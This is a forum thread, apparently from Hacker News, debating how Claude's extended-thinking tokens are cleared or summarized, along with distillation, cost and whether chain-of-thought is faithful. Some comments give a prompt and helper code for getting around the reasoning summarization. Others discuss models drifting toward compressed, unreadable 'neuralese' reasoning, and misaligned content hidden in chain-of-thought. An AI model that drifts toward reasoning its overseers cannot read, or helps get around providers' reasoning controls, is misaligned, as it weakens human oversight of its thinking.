> The design should have been simple: if a session has been idle for more than an hour, we could reduce users’ cost of resuming that session by clearing old thinking sections. Since the request would be a cache miss anyway, we could prune unnecessary messages from the request to reduce the number of uncached tokens sent to the API. We’d then resume sending full reasoning history. To do this we used the clear_thinking_20251015 API header along with keep:1.
They clearly make the same distinction between the cache and the context. They're saying "we could reduce users’ cost of resuming that session by clearing old thinking sections". They intentionally created a behavior different between cached and uncached requests, specifically they clear thinking sections from the context for requests that miss the cache.
but yes you're correct on the responses api already baking it in too
supposedly keeping these between tool calls should help the model reason and have better overall outputs etc
That would be surprising to me. The reasoning _is_ the model intelligence in a lot of respects, and so dropping those from the context would affect its output pretty significantly.
I assume that instead they just have a lot of guardrails in place and multiple runtime environments that individual turns ping-pong between in order to dehydrate/rehydrate the reasoning to keep it hidden from the end user.
"Stripping extended thinking: Extended thinking blocks (shown in dark gray) are generated during each turn's output phase, but are not carried forward as input tokens for subsequent turns. You do not need to strip the thinking blocks yourself. The Claude API automatically does this for you if you pass them back."
It's more nuanced in the various modes, but i haven't seen it boil down towards Thinking Tokens surviving more than two turns.
default depends on the model class. Opus: Claude Opus 4.5 and later Opus models keep all prior thinking blocks; Claude Opus 4.1 (deprecated) and earlier Opus models keep only the last assistant turn's thinking. Sonnet: Claude Sonnet 4.6 and later Sonnet models keep all; Claude Sonnet 4.5 and earlier Sonnet models keep only the last turn. Haiku: all Haiku models through Claude Haiku 4.5 keep only the last turn. Claude Mythos Preview also keeps all prior thinking blocks.
That would also explain the issue I mention in my other comment. And would also reinforce how much output would degrade without this. Opus 4.5 was a step above previous models in my experience. At some point it degraded and only got better when I disabled adaptive thinking. Adaptive thinking is always on for 4.6 and above.
I also wonder if they actually do a hybrid of "standard reasoning" and then classify this stripped chain of thought as "extended thinking".
The reasoning may be hidden but the tool calls are not, how else would the client execute them
... what exactly is your threat model? How are "attackers" getting themselves involved in the first place?
Fun fact: if you go back to the old school from 2 years ago and provide explicit CoT prompts, you get the full thinking prompts back again!
So you disable thinking altogether, and instead make thinking part of the regular prompt by prompting it:
“Before providing your answer, think step by step. For example:
The user is asking me to… I need to think about the blah blah. First, I should foo the bar, and then blah blah.
Answer: <put your final answer here>”
And tada.wav we have CoT as it worked in the GPT3 era back again.
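For anyone who wants to try it, a minimal sketch of the plumbing: build the prompt, then split the reply on the `Answer:` marker. The template wording and the helper names `build_cot_prompt` and `split_cot` are my own; sending the prompt to a model is left out on purpose since that part depends on your provider.

```python
COT_TEMPLATE = (
    "{question}\n\n"
    "Before providing your answer, think step by step.\n"
    "Answer: <put your final answer here>"
)


def build_cot_prompt(question):
    """Wrap a question in an explicit think-step-by-step instruction."""
    return COT_TEMPLATE.format(question=question)


def split_cot(response, marker="Answer:"):
    """Split a model reply into (reasoning, answer) at the last marker."""
    reasoning, sep, answer = response.rpartition(marker)
    if not sep:
        # No marker found: treat the whole reply as the answer.
        return "", response.strip()
    return reasoning.strip(), answer.strip()


reply = "The user is asking me to add. First, 2 + 2 is 4.\nAnswer: 4"
print(split_cot(reply))
```

Whether the visible reasoning you get this way matches what a "thinking" mode would have produced is a separate question; this only gets you the GPT-3-era style back.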
I also don’t believe Chinese LLM labs don’t know this, so I’m fairly certain the whole summarized thinking isn’t preventing them from distillation.
Still, one of the daily most played WAV files worldwide, I'd guess? :-D
You are correct in my intentions on this post generally.
I want to highlight:
I want to measure performance of the LLMs over time- which includes assessing the quality of their outputs. I don’t perceive the reasoning output to be anything other than a measurable signal of possible drift in model performance.
Except it isn’t, because I’m only getting a low value summary of the thinking.
It’s like asking your buddy how fast he thought that last pitch was when radar guns are behind the plate.
Yeah, it’s a description related to what happened, but it’s not the thing I want to measure.
It only makes sense that the same mechanism comes into play in strictly-verbal contexts.
Also, this is why "distillation attacks" are largely bullshit that Anthropic spreads for political purposes. Proper distillation requires access to the logits.
Why do you need logits? Can't you just train on cross-entropy loss of the model against the hard decision, like you do in regular pretraining?
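The two positions can be put side by side. This is a toy sketch in plain Python, with function names of my own choosing: the hard-label loss only needs the token the teacher emitted (what you get from API text), while the soft-label loss needs the teacher's full distribution.

```python
import math


def softmax(logits):
    """Numerically stable softmax over a list of floats."""
    m = max(logits)
    exps = [math.exp(x - m) for x in logits]
    total = sum(exps)
    return [e / total for e in exps]


def hard_label_loss(student_logits, teacher_token):
    """Cross-entropy against the single token the teacher actually emitted."""
    return -math.log(softmax(student_logits)[teacher_token])


def soft_label_loss(student_logits, teacher_logits):
    """KL(teacher || student) over the whole vocabulary; needs teacher logits."""
    p = softmax(teacher_logits)
    q = softmax(student_logits)
    return sum(pi * math.log(pi / qi) for pi, qi in zip(p, q) if pi > 0)


student = [0.0, 0.0, 0.0, 0.0]
teacher = [2.0, 1.0, 0.0, -1.0]
print(hard_label_loss(student, teacher_token=0))
print(soft_label_loss(student, teacher))
```

The soft version carries more signal per token because it tells the student how the teacher ranked every alternative, but nothing stops you from training on the hard version with sampled text alone.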
There are definitely current-gen open-weight models (Step 3.7 Flash is one) that refer to themselves as an OpenAI model in CoT, but not in the final response.
0: https://wiki.roshangeorge.dev/w/Blog/2025-10-12/Word_Magic#I...?
1: In the sense of true belief, I suppose
Yes, several models think in weird jargon. Here is an example of Mythos's thinking while playing solitaire: https://www.lesswrong.com/posts/wCSEpT3dTGz4N86Wi/even-illeg...
> 7♣-removal-IS-the-prerequisite-for-10♠/9♥!!)-⟹-OVERLAP-(ii)+(iv):-{6♠ J♦ 9♥ 2♣}-=-FOUR--—-UNLESS-7♣'s-seat-8♥-...-and-2♣-drains-only-at-crack-:-⟹-2♣-celled-+-9♥-celled-simultaneously-UNAVOIDABLE-in-t8-dig--—-BREAK:-9♥
This is a small step in the direction of something called "neuralese", where the model has stopped thinking in English and is thinking in internal vector spaces. Since this gets serialized through text, it isn't quite true neuralese, but it's moving in that direction.
I mean, I'm sympathetic towards the models. My internal thought process when writing code uses lots of intermediate steps that would be hard to write out in English.
This is something really interesting to me. It turns out there's far more diversity in thinking than you'd imagine given that we're all largely similar meat-in-a-box. I'm on the visio-spatial-tacit wing and speaking my thoughts outloud can be very awkward, whereas one of my former coworkers is on the "all thinking is in words and visual/spatial information comes in the form of words describing the scene" wing, so he can literally narrate his thought process out loud, very interesting conversations can be had discussing the subjective differences.
https://www.patheos.com/blogs/tippling/2013/11/14/post-hoc-r...
https://www.researchgate.net/publication/316045349_Post_Hoc_...
I'm not sure that applies to discursive writing, when we essentially use rules of logic to decide on the course of the narrative. Non-verbal heuristics still applies, of course, but we constrain it, so it's probably not entirely post hoc.
To my knowledge, the only products Anthropic produces are Claude, Claude Code, and Claude API, all of which are clearly their own products, and not anything you invented.
Which particular product are you claiming they "slurped up"?
Setting aside coding agents.. we really need this information to even pretend to evaluate the claims of stuff like mathematical breakthroughs, which is exactly why we will never see it. Very embarrassing to get the right answer for the wrong reason. But to give the models some credit, you could argue that even paying too much attention to the thinking is misunderstanding how CoT works. The argument would be that thinking in LLMs isn't really thinking, that it's self-reinforcement and circling to encourage stability around beneficial attractors instead of degenerate ones. Can't have it both ways though: either the thinking is thinking and so it should be correct. Or the thinking is NOT thinking, and it's NOT real justification for the outcome, and these systems are even more hopelessly opaque than we usually assume.
Why?
Either the proof is correct, or it isn't, right?
And it either produces them reliably or not, right?
Like, even if its reasoning is completely wrong, and it's only producing correct answers 10% of the time, that's still an astounding amount above baseline and a useful tool.
Humans have inaccurate thinking all the time, and are also pretty hopelessly opaque. "It came to me in a dream" is a major plot point in the history of math. I'd still trust Ramanujan more than most mathematicians, since he got the right answer.
I thought it was widely accepted that it's not; eg https://www.anthropic.com/research/natural-language-autoenco...
But the nuance under discussion here is exactly the kind of stuff you people take for granted in the AGI or reasoning threads. If it's practically relevant for tools/workflows with claude code, it's a good angle, maybe people are more willing to pay more attention to the details.
fyi openai does the same; not really surprising or particularly evil
Every closed-source project and really the vast majority of commercial exercises involve a large amount of "prevent consumers from copying this" - Coca-Cola's formula is a trade secret, Windows is copyrighted, etc.
it's enough for them to be slightly better for this to make sense; I'm not sure most people would consider this to be a worse product either -- it's annoying for devs and makes hotswapping models more of a problem, but who has the time to read CoT as a user?
Pages of “I have to be careful, the user is asking that I do something related to cybersecurity that could easily be turned around and used offensively” but then happily gives me what I wanted.
> preventing misuse.
Imagine not being able to read the tokens you are paying for.
Back when I used antigravity, it used to show the reasoning intact - at least for Gemini Pro 3.1, and likely for Claude Opus 4.6 (not 100% certain about it). I have some recollection of stopping the models mid-turn when they started going astray.
As a power user, I find reasoning fascinating to read and genuinely useful at times. Probably not that useful for 80% of their base.
The LLM providers will clearly evolve to be more and more opaque as their services get more capable. The frontier models may even be provided as purely internal advisor or async only so they can monitor your CoT and final answers for cyber etc.
RL (the basis of LLM "thinking") is a pretty crude way to achieve the appearance of reasoning given that it reinforces all the steps, including missteps, that got it to a reward. Providing a summary could be seen as form of sane-washing, making the model look more purposeful and directed than it really is!
If that is the case thinking is not visible to us as users due to it not being done in text.
Idea somewhat similar to what you describe exist but they make steering/post-training/interpretation much harder.
EDIT:
They link to a Meta paper from 2024/2025 though: https://arxiv.org/pdf/2412.06769/.
I don't know about Claude, but latest GPT versions still have a readable reasoning stream. It sometimes leaks out when the model gets confused, e.g., during a tool call. If you're curious, looks simplified; less words; extremely compact. They optimize tokens. But remain readable.
- "Read `description` and create a specification, implementation guide, and checklist."
- "Ask clarifying questions. If any of those questions has a clear best recommendation, please select that yourself and record that in 'autorecommendations.md'."
- "Have codex and antigravity review each of these and work to consensus."
These are the core of ~61 lines of prompting I do across 3 prompts, and I feel like the resulting artifacts describe some of the thinking. Also, some of the back-and-forth between the models feels like it gives some insight into the model "thinking".
I will say: I heavily used Fable when it was available; Opus + loops + codex and/or antigravity review is better than Fable at building things.
Mind sharing your prompts?
I do miss the days when reasoning was visible. Another point for open source models!
> You've provided the current rewritten thinking and the guidelines, but I don't see the "next thinking" content that I should be rewriting. Could you provide the next thinking that needs to be rewritten?
These sentences are completely unrelated to the actual conversation
Nope, not your agent, if you're not running it locally. You just get to use it in whatever way they allow (also see the whole OpenClaw backlash and claude -p changes), unless there'd be regulation and laws around this (which there aren't and would be lobbied against anyways).
> Getting the full thinking output requires an enterprise agreement.
If you truly need it, then that's a (costly) option. Seems like they're largely doing this to prevent other AI foundries from doing as much distillation and stealing their CoT output en masse.
Luckily more open models don't generally do that.
Edit: If you still need something decently capable in the cloud, I’d suggest GLM, DeepSeek, MiMo or Kimi or Minimax, maaaybe sometimes Mistral for a simple EU subscription. Or look at all the pay-per-token options on OpenRouter, though be mindful of quantization.
For running something locally Qwen 3.6 35B A3B is presently a decent starting point but it will be rather limited, either way you can look up the Unsloth quants on HuggingFace for something like llama.cpp or Ollama or LM Studio.
All will work with OpenCode and Kilo Code, and most other tools. Can also try with Claude Code, I made a tool for that too: https://ccode.kronis.dev/ (or just set the env variables and maybe some aliases for something close enough), but frankly OpenCode is nice nowadays.
Proprietary technology is fun /s
What a waste of time
Well yes exactly, because they have billions of investments riding on it and why would anyone semi-bankrupt their org paying API rates for Anthropic, if a hypothetical DeepSeek V5 Pro would have almost all of Opus capabilities at that point, due to immense distillation?
Will people keep paying a highly highly premium price for another 5% intelligence when you just loop 5 more times for much cheaper?
Their time would be better spent making a more competitive and more compelling tool instead of adding walls that are easy to jailbreak. There’s always another way around.
writes this^ and then proceeds to highlight a bold title from the docs that says "summarized thinking" that explains things clearly in the first sentence. lol
It’s much harder to understand _why_ a model chose a particular approach in Claude Code. Especially because Claude will happily give you hallucinated reasons if you ask in retrospect.
Recent anecdote:
I was reviewing a colleague’s PR and Opus 4.8 decided to write the new feature in a completely new module. It was unnecessarily complex. We had a hard time understanding why it chose that, and it told us that it was so we could eventually deploy it as a separate micro-service and test it independently. What?
Only after being a lot more specific about the implementation and spending a lot more tokens, it flat out refused to simplify the code, giving the actual reason. It turns out a line recently added to CLAUDE.md was making it incorrectly think that the module it was originally supposed to modify was legacy code that it was forbidden to extend.
This would have been caught immediately if we could inspect its thinking process.
this is really really not that bad at all
1. make distillation much harder
2. safety: prevent modifications to the thinking leading to injection attacks.
3. also honestly sometimes the model raw thoughts can be deranged and is not a good user experience (consider the varied audience in the market, etc.)
also often the mass underestimate/the model makers over-estimate how people love distilling models
On further reflection it is such a great indignity & such a colossal barrier to working with the machine that it insists on being a black box. The disingenuity of the American models (small print: except AI2 & some other labs; you all are so great) is a massive disadvantage to their use, and a massive slap in the face.
It's a threat to human intelligence that it is not co-participative. Walking further into my own judgement and feelings: the insistence on being an opaque black box, Searle's Chinese Room, is such a vicious harm to society! This is civilizationally an unsafe form of AI that probably should be outlawed as anti-social. It's an impermissible asymmetry, a crippling dependent relationship to be forced into. I'm working myself up, but here: this, imo, is not just an indignity; it is harmful, it is evil.
This "6 month behind" trend we've seen for open models feels like it will at some point be less important than simply the models' unwillingness to speak for themselves & to be observable.
I suspect that in some decades, as other architectures are found and used, that the inability of an LLM to "think" without also emitting a token will be seen as one of their fundamental limitations.
Humans somewhat do the same - something that's been demonstrated in split-brain experiments.
Because of the nature of how LLMs work — text prediction engines - by putting the explicit reasoning steps first, it improves the likelihood of the final answer (which then is being predicted based on the entire reasoning chain as input) being correct.
This evades an easy yes or no, so:
1. Many consumers believe reasoning-models allow that kind of question to be truthfully-answered, and their belief is reasonable given the marketing going on.
2. Implementers probably do not have the same belief when it comes to what the terms mean or what capabilities they imply.
3. Yes, it doesn't actually do what the customer wanted it to do, which is a kind of retrospective introspection of internal thoughts and ideas.
____________
I advocate looking at everything from a document-generation perspective to cut down on traps and cognitive illusions. The "reasoning" models are a change in the style of document being iteratively-grown by the LLM, as opposed to something more anthropomorphized.
* Default: There's just the spoken dialogue between a Human Customer and Helpful Chatbot.
* "Reasoning": There's the spoken dialogue and a bunch of times the Helpful Chatbot character has an internal monologue. This provides more consistency between iterations, and can be mined by custom tools to call external code and insert results.
If your Human Customer character asks "Why did you say that", the LLM does not engage in a different process than for "I have eaten an apple."
The LLM has no memories to consult or hidden goals to contemplate; it's the same process of finding more stuff that fits at the end of the document. Any benefit from a "reasoning model" is that the LLM generates much better-looking additions because there's more (hidden) stuff for it to confabulate against.
1. https://medium.com/@eshvargb/the-llm-journey-how-neural-netw...
Tell me this. If you hired a junior engineer or designer who refused to explain their thinking on their code and how they solved for the spec what would you do?
(That being said the reasoning output is still a summary of the Kvcache)
Any explanation that someone gives of their thinking process is necessarily lossy and likely partially confabulated.
If it's useful, it's useful, enjoy. If you aren't comfortable with that, don't use LLMs. You aren't going to get a mathematical proof of your output, just learn to be comfortable with that, or opt out and be a goat farmer.
No, they aren't a summary. They are the actual decoding of the sequence of tokens emitted during the “thinking” stage of response generation.
Just as with, say, a human inner monologue in words vs actual speech, they are a product of the same output process as the non-thinking tokens. They aren’t a translation of the internal process that precedes the output mapped into language, either as a full result or a summary.
Having access to the reasoning text and output would help with performance measurement.
For daily use I actually like the reasoning summary to be brief/quick to scan.
That said, I understand the author’s desire for the real thing. It just feels better to have that access, especially when Anthropic will give it to you, but encrypted.
You can't even guarantee WHAT model you get. Or if they downgrade you. Or if you 'offend corporate sensibilities' and they misdirect or lie.
The only way to get good returns on a model is to run it yourself. Quit paying for corporate bullshit.
This could all be optics as well to try to give the appearance of a defensible moat. E.g. they can claim to investors that they are able to protect a significant chunk of their intellectual property this way. I'm not sure if anyone has a study about how significant the summarization is to distillation.
In the case of makers of open-source models (which are also competition), there is no "allegedly": they were (and still are) openly doing that.
That distillation might be inferred from the behavior of commercial models is not the same as them openly doing it.
https://en.wikipedia.org/wiki/Economic_moat
It may also be that misaligned responses can be in CoT which OpenAI does not want to show to users.
In this case it stops people copying your IP
Being currently in the lead in a category is not a moat; a moat is whatever creates a barrier to competitors catching up when you are in the lead. Merely being in the lead is not a moat except in a market with strong network externalities.
> The computation we can see looks like it’s just guessing the answer, despite the chain of thought suggesting it’s computed it using a calculator.
It might be hallucinating or lying, it's not like you are actually observing the internals of the model.
Nor does a knee-jerk accusation of "anthropomorphizing" negate the fact that procedures that mimic human processing, even when done in software, are deservedly anthropomorphized, because they're a legitimate approximation of the equivalent human operations.
Computers don’t think, they process; those are very different activities.